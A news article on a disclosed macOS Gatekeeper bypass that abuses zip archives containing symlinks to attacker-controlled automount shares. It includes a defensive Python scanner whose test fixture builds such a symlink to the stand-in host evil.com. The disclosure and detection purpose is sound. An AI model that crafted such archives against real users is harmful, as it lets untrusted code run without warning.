Security Researcher Details Gatekeeper Vulnerability in macOS

Security researcher Filippo Cavallarin has detailed a macOS exploit that bypasses Gatekeeper. The exploit works even on macOS Mojave 10.14.5, released by Apple last week.

The exploit allows attackers or anyone with malicious intent to run untrusted code on a Mac without triggering any user permission prompt.

Gatekeeper has been a part of macOS since 2012. It blocks unsigned or otherwise untrusted apps from launching by default and requires explicit user confirmation before they can run.

The exploit takes advantage of Gatekeeper treating both external drives and network shares as safe locations, so executables opened from them are not subject to its checks.

Below is a video showing how the exploit works:

Cavallarin's blog post contains the detailed steps for reproducing the exploit and also explains how an attacker could use the technique to their advantage.

To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot.
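The delivery vector in the scenario above is an archive carrying a symlink into an automount path. The following is an added example, not code from the article or from Cavallarin's write-up, of how a defender could scan a zip archive for such symlinks before it reaches a user; the archive it inspects is constructed inline for the demonstration, and the list of automount roots is an assumption (the page only names /net/).

```python
import io
import stat
import zipfile

# Automount roots that resolve to network shares trusted by Gatekeeper.
# /net/<host>/<share> is the path used in the write-up; /Network/ is an
# assumption added here for the Finder-visible network mount root.
AUTOMOUNT_PREFIXES = ("/net/", "/Network/")


def symlink_entries(zip_bytes):
    """Yield (entry_name, link_target) for every symlink stored in the archive.

    Unix-created zip entries keep the file mode in the high 16 bits of
    external_attr; for a symlink the entry body is the link target path.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                yield info.filename, zf.read(info).decode("utf-8", "replace")


def suspicious_links(zip_bytes):
    """Return symlinks whose target lies under an automount root."""
    return [
        (name, target)
        for name, target in symlink_entries(zip_bytes)
        if target.startswith(AUTOMOUNT_PREFIXES)
    ]


def build_sample_archive():
    """Build a constructed test archive (not a real sample): one benign file
    plus a symlink named 'Documents' pointing at an automount path, mirroring
    the scenario described in the write-up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless text file\n")
        link = zipfile.ZipInfo("Documents")
        link.create_system = 3  # Unix, so the mode bits above are meaningful
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/net/evil.com/Documents")
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in suspicious_links(build_sample_archive()):
        print(f"symlink {name!r} -> {target!r} points into an automount root")
```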

Filippo Cavallarin informed Apple about the exploit on February 22nd, 2019. The company was initially in touch with Cavallarin and promised a fix by May 15th, 2019, i.e., within 90 days of the report. However, Apple later stopped replying to his emails, and the issue remains present in macOS 10.14.5, released last week. With the 90-day period over, Cavallarin went ahead and disclosed the exploit publicly.

There is no patch for this exploit as of now; as a workaround, you can disable automount on your Mac until Apple gets around to resolving it.

[Via FCVL]